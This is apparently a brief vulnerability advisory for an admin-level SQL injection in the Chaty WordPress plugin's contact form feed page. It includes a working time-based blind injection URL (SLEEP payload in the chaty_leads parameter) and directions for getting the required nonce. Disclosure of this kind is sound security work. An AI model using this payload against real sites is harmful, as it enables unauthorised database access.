The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove;_chaty_leads=9a03751f9d&action;=delete_message&paged;=1&search;&chaty;_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B–± To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads